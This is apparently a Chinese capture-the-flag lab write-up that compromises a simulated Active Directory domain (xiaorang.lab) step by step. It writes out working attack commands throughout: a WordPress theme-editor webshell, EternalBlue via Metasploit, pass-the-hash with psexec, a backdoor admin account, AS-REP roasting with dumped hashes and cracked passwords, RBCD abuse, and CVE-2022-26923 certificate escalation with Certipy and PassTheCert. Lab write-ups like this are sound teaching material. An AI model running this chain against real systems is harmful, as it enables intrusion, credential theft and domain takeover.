春秋云镜-2022网鼎半决赛复盘

AS-REP Roasting、WordPress RCE、RBDC、CVE-2022-26923

信息收集

fscan

无果

dirsearch

扫到了一堆

[01:14:02] 301 -    0B  - /index.php  ->  http://39.99.132.104/
[01:14:04] 200 -   19KB - /license.txt
[01:14:11] 200 -    7KB - /readme.html
[01:14:12] 403 -  278B  - /server-status
[01:14:12] 403 -  278B  - /server-status/
[01:14:18] 200 -    0B  - /wp-config.php
[01:14:18] 301 -  317B  - /wp-admin  ->  http://39.99.132.104/wp-admin/
[01:14:18] 200 -    0B  - /wp-content/
[01:14:18] 409 -    3KB - /wp-admin/setup-config.php
[01:14:18] 200 -    1KB - /wp-admin/install.php
[01:14:18] 302 -    0B  - /wp-admin/  ->  http://39.99.132.104/wp-login.php?redirect_to=http%3A%2F%2F39.99.132.104%2Fwp-admin%2F&reauth=1
[01:14:18] 301 -  319B  - /wp-content  ->  http://39.99.132.104/wp-content/
[01:14:18] 400 -    1B  - /wp-admin/admin-ajax.php
[01:14:18] 200 -   69B  - /wp-content/plugins/akismet/akismet.php
[01:14:18] 500 -    0B  - /wp-content/plugins/hello.php
[01:14:18] 200 -    1KB - /wp-content/uploads/
[01:14:18] 200 -  777B  - /wp-content/upgrade/
[01:14:18] 200 -    0B  - /wp-includes/rss-functions.php
[01:14:18] 200 -    5KB - /wp-login.php
[01:14:18] 200 -    0B  - /wp-cron.php
[01:14:18] 302 -    0B  - /wp-signup.php  ->  http://39.99.132.104/wp-login.php?action=register
[01:14:18] 301 -  320B  - /wp-includes  ->  http://39.99.132.104/wp-includes/
[01:14:18] 200 -   54KB - /wp-includes/
[01:14:19] 405 -   42B  - /xmlrpc.php

WordPress 插件 rce

wp-admin 能加载，一个 wp 登录框

admin:123456 登陆进去，有 theme file editor，直接改 php 文件

连上路径

http://39.99.132.104/wp-admin/theme-editor.php?file=functions.php

在根目录拿到 flag01

flag01: flag{9a8904be-64af-4faa-a667-d6ef0bc0ad64}

MS17-010

传 fscan 扫主机

[2025-07-19 01:36:07] [HOST] 目标:172.22.15.13 状态:alive 详情:protocol=ICMP
[2025-07-19 01:36:08] [HOST] 目标:172.22.15.18 状态:alive 详情:protocol=ICMP
[2025-07-19 01:36:10] [HOST] 目标:172.22.15.24 状态:alive 详情:protocol=ICMP
[2025-07-19 01:36:10] [HOST] 目标:172.22.15.26 状态:alive 详情:protocol=ICMP
[2025-07-19 01:36:10] [HOST] 目标:172.22.15.35 状态:alive 详情:protocol=ICMP
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.18 状态:open 详情:port=445
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.13 状态:open 详情:port=445
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.13 状态:open 详情:port=139
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.13 状态:open 详情:port=389
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.13 状态:open 详情:port=135
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.13 状态:open 详情:port=88
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.18 状态:open 详情:port=139
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.18 状态:open 详情:port=135
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.18 状态:open 详情:port=80
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.24 状态:open 详情:port=3306
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.24 状态:open 详情:port=445
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.24 状态:open 详情:port=139
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.24 状态:open 详情:port=135
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.24 状态:open 详情:port=80
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.26 状态:open 详情:port=22
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.26 状态:open 详情:port=80
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.35 状态:open 详情:port=445
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.35 状态:open 详情:port=139
[2025-07-19 01:36:13] [PORT] 目标:172.22.15.35 状态:open 详情:port=135
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.18 状态:identified 详情:hostname=XR-CA, ipv4=[172.22.15.18], ipv6=[]
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.35 状态:identified 详情:port=139, domain_name=XIAORANG, workstation_service=XR-0687, server_service=XR-0687
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.13 状态:identified 详情:ipv4=[172.22.15.13], ipv6=[], hostname=XR-DC01
[2025-07-19 01:36:16] [VULN] 目标:172.22.15.24 状态:vulnerable 详情:port=445, vulnerability=MS17-010, os=Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.35 状态:identified 详情:ipv4=[172.22.15.35], ipv6=[], hostname=XR-0687
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.13 状态:identified 详情:service=smb, os=Windows Server 2016 Standard 14393, port=445
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.24 状态:identified 详情:hostname=XR-WIN08, ipv4=[172.22.15.24], ipv6=[]
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.26 状态:identified 详情:Url=http://172.22.15.26, status_code=200, length=39962, server_info=map[content-type:text/html; charset=UTF-8 date:Fri, 18 Jul 2025 17:36:16 GMT length:39962 link:<http://172.22.15.26/index.php/wp-json/>; rel="https://api.w.org/" server:Apache/2.4.41 (Ubuntu) status_code:200 title:XIAORANG.LAB vary:Accept-Encoding], fingerprints=[], port=80, service=http, title=XIAORANG.LAB
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.18 状态:identified 详情:workstation_service=XR-CA, server_service=XR-CA, os_version=Windows Server 2016 Standard 14393, port=139, computer_name=XR-CA.xiaorang.lab, domain_name=xiaorang.lab, netbios_domain=XIAORANG, netbios_computer=XR-CA
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.18 状态:identified 详情:length=703, server_info=map[accept-ranges:bytes content-length:703 content-type:text/html date:Fri, 18 Jul 2025 17:36:16 GMT etag:"87cafbaec95d91:0" last-modified:Sat, 03 Jun 2023 07:26:35 GMT length:703 server:Microsoft-IIS/10.0 status_code:200 title:IIS Windows Server], fingerprints=[], port=80, service=http, title=IIS Windows Server, Url=http://172.22.15.18, status_code=200
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.13 状态:identified 详情:port=139, computer_name=XR-DC01.xiaorang.lab, domain_name=xiaorang.lab, netbios_domain=XIAORANG, server_service=XR-DC01, domain_controllers=XIAORANG, netbios_computer=XR-DC01, workstation_service=XR-DC01, os_version=Windows Server 2016 Standard 14393
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.24 状态:identified 详情:workstation_service=XR-WIN08, server_service=XR-WIN08, os_version=Windows Server 2008 R2 Enterprise 7601 Service Pack 1, port=139, computer_name=XR-WIN08, domain_name=XR-WIN08, netbios_domain=XR-WIN08, netbios_computer=XR-WIN08
[2025-07-19 01:36:16] [SERVICE] 目标:172.22.15.24 状态:identified 详情:length=0, server_info=map[content-length:0 content-type:text/html date:Fri, 18 Jul 2025 17:36:16 GMT length:0 location:/www redirect_Url:http://172.22.15.24/www server:Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 status_code:302 title:无标题 x-powered-by:PHP/5.5.9], fingerprints=[], port=80, service=http, title=无标题, Url=http://172.22.15.24, status_code=302
[2025-07-19 01:36:18] [SERVICE] 目标:172.22.15.24 状态:identified 详情:status_code=200, length=135, server_info=map[cache-control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0 content-type:text/html date:Fri, 18 Jul 2025 17:36:17 GMT expires:Thu, 19 Nov 1981 08:52:00 GMT length:135 pragma:no-cache server:Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 set-cookie:rid=vv8286s2m8eiiue19vuvkdbcn4; path=/ status_code:200 title:无标题 x-powered-by:PHP/5.5.9], fingerprints=[], port=80, service=http, title=无标题, Url=http://172.22.15.24/www

信息如下：

172.22.15.13 XR-DC01 域名xiaorang.lab。
172.22.15.18 XR-CA	同属 xiaorang.lab
172.22.15.24 80,3306 XR-WIN08 MS17-010
172.22.15.35 445,139 XR-0687

172.22.15.24 存在永恒之蓝漏洞

老样子传 frpc 和 frpc.ini 流量转发，proxychains 代理一下 msf 打永恒之蓝

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
run

不知道为啥执行 shell 会超时，进行 hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

执行

proxychains impacket-psexec administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk

拿到 system 权限

进入 Administrator 用户目录下

拿到 flag02

flag02: flag{65518b91-b026-4cfd-a62e-75aea9d458f6}

RDP

扫 172.22.15.24 目录发现有 phpAdmin，但是没有密码，但是发现这台机器桌面上有 phpstudy，可以尝试远程连接，先添加用户密码

net user butt3rf1y qwe456@ /add
net localgroup administrators butt3rf1y /add

远程查看 phpstudy 拿到俩密码

root root@#123
zdoo zdoo123

root 账号登录 phpAdmin，在 zdoo 数据库的 zdoosys_user 中找到很多域用户信息，先保存下来

ZDOO OA

发现 phpstudy 搭建的网站，尝试 zdoo:zdoo123 登录，不行

admin:123456 成功登录，就有一些用户信息，但是之前在数据库中已经拿到了

AS-REP Roasting

尝试 AS-REP Roasting 攻击

proxychains impacket-GetNPUsers -dc-ip 172.22.15.13  xiaorang.lab/ -usersfile user.txt

得到两个 TGT 票据

$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:beb6333f35e707252e4e869ffed9b20f$75941020628623dc735e3b60ed28131e974c7725788c93d53034211419a12878a24ff34d77fe4f2db6f5364a68c1120cd1958eb758b2e23b1f7d8e117e03ab0503a916da4e7bd75bfb17514266253598c020093b5d17d536caeedbbea4ed8f1b000c168cb75c6e0937ca877aed51334a0c8c36efa487a534fed1e25ef2f5725488da057aa0c4f89cdb2f4341db8297c810a21765394e7426513ca83f98557eaa4230d1d6ecd6f723034340c5d4cc2fc67ea88feb620325c3042b584dd59224b8b6618aa89607c71227d51c1068a85617cd91f549a9f155c594bb96bf824d7755d194042ce253f4cca684574a

$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:947a93f5ea00c81d436c808d791742ad$5819df23d5c9779825928b8e7cac411362fe1aca403eb601ea80fcb08b5d8a3fd3ed06201e1bd05abee4c026359b1eac57a69dceed7c5842bd15641f04c312cf2658fc66319b594b9d42a4d5b070e40dfab0d63a04f278f08634f804f285638ea4240954b6b87fad1d7963d2ca462d85b4da4d566847929155bdb9e3dd3c2d97082f962239f6412a2de8643b5e433c0464a896428adcd7e1bbb25230d2065f2e79abcf0b2f0132ca72a2f5fa6d072860098f16f6110fac48732c4d458ea6ab7a219edf8fda033eabcf8e474b790d634183fd5b49ef0ad525034fb1ce643dceb7fce754fdde066e2ca1e4ba70

用 hashcat 爆破，爆出两个密码

lixiuying@xiaorang.lab:winniethepooh
huachunmei@xiaorang.lab:1qaz2wsx

RDP 继续连接 172.22.15.35

proxychains4 bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp

导入 bloodhound 查看域关系图

可以看到 LIXIUYING@XIAORANG.LAB 对 XR-0687.XIAORANG.LAB 有 GenericWrite 的权限，熟悉的 RBCD

RBDC

添加机器用户进去

proxychains impacket-addcomputer -method SAMR xiaorang.lab/lixiuying:winniethepooh -computer-name butt3rf1y$ -computer-pass 'u4happy@' -dc-ip 172.22.15.13

修改 XR-0687$ 的 msDS-AllowedToActOnBehalfOfOtherIdentity 字段

proxychains -q impacket-rbcd xiaorang.lab/lixiuying:winniethepooh -action write -delegate-from "butt3rf1y$" -delegate-to "XR-0687$" -dc-ip 172.22.15.13

butt3rf1y$   (S-1-5-21-3745972894-1678056601-2622918667-1147)

用 impacket 的 getST 执行 RBCD 攻击，获取机器上的 Kerberos 服务票据 TGS

proxychains -q impacket-getST xiaorang.lab/butt3rf1y$:'u4happy@' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

导入票据

export KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache

直接访问目标主机

proxychains -q impacket-psexec 'xiaorang.lab/administrator@XR-0687.xiaorang.lab' -target-ip 172.22.15.35 -codec gbk -no-pass -k

在 C:\Users\Administrator\flag 下拿到 flag03

flag03: flag{e8893d4e-1e26-4e14-a8ff-5eff3b928f81}

CVE-2022-26923

最后剩下了拥有 CA 的 172.22.15.18，fscan 扫到一个 Active Directory 证书服务漏洞

经过一番搜索发现是 CVE-2022-26923 Windows域提权，参考 ADCS攻击笔记

当 Windows 系统的 Active Directory 证书服务（CS）在域上运行时，由于机器账号中的 dNSHostName 属性不具有唯一性，域中普通用户可以将其更改为高权限的域控机器账号属性，然后从 Active Directory 证书服务中获取域控机器账户的证书，导致域中普通用户权限提升为域管理员权限

创建一个机器用户将该机器用户 dNSHostName 属性指向域控，先下载 certipy-ad，Certipy

proxychains certipy-ad account create -user 'butt3rf2y$' -pass 'p4ppy' -dc-ip 172.22.15.13 -u lixiuying -p 'winniethepooh' -dns XR-DC01.xiaorang.lab

成功写入后，向 AD CS 请求域控的证书

proxychains certipy-ad req -u 'butt3rf2y$@xiaorang.lab' -p 'p4ppy' -target 172.22.15.18 -ca 'xiaorang-XR-CA-CA' -template 'Machine'

然后用申请的证书请求 DC$ 的 TGT

proxychains certipy-ad auth -pfx xr-dc01.pfx -dc-ip 172.22.15.13

遇到了错误：

Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

换成设置 RBCD 来攻击，通过 Schannel 将证书传递到 LDAPS, 修改 LDAP 配置 (例如配置 RBCD / DCSync), 来获得域控权限

openssl pkcs12 -in xr-dc01.pfx -out xr-dc01.pem -nodes
openssl rsa -in xr-dc01.pem -out xr-dc01.key
openssl x509 -in xr-dc01.pem  -out xr-dc01.crt

地址：https://github.com/AlmondOffSec/PassTheCert/

proxychains python3 PassTheCert-main/Python/passthecert.py -action whoami -crt xr-dc01.crt -key xr-dc01.key -domain xiaorang.lab -dc-ip 172.22.15.13

将证书配置到域控的 RBCD

proxychains python3 PassTheCert-main/Python/passthecert.py -action write_rbcd -crt xr-dc01.crt -key xr-dc01.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'butt3rf2y$'

申请ST

proxychains impacket-getST xiaorang.lab/'butt3rf2y$':'p4ppy' -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

然后导入

export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache

配置下 hosts

172.22.15.13	XR-DC01.xiaorang.lab

连接就行了

proxychains impacket-psexec Administrator@XR-DC01.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13

拿到 flag04

flag04: flag{c2278fc6-e66f-4f16-827a-84ffcd44b462}